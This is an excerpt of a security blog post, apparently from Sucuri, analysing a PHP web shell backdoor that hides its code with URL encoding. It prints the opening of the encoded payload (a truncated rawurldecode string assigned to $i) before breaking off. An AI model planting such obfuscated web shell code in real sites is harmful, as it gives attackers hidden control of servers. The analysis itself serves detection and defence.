In an attempt to avoid detection, attackers and malware authors are always experimenting with different methods to obfuscate their malicious code.
During a recent investigation, we came across an interesting backdoor that was leveraging encoding along with common PHP functions to conceal its operations from any active security systems on the host.
This PHP web shell uses the following obfuscation method, where the web shell code is stored in URL encoded format and assigned to the variable $i:
$i = rawurldecode(“%3C%3Fphp%0A%20set_time_limit%280%29%3Berror_reporting%280%29%3Bif%28get_magic_quotes_gpc%28%29%29%7Bforeach%28%24_POST%20as%20%24key%3D%3E%24value%29%7B%24_POST%5B%24key%5D%3Dstripslashes%28%24value%29%3B%7D%7D%3F%3E%0A%3C%21DOCTYPE%20htm
Continue reading Backdoor Obfuscation: tempnam & URL Encoding at Sucuri Blog.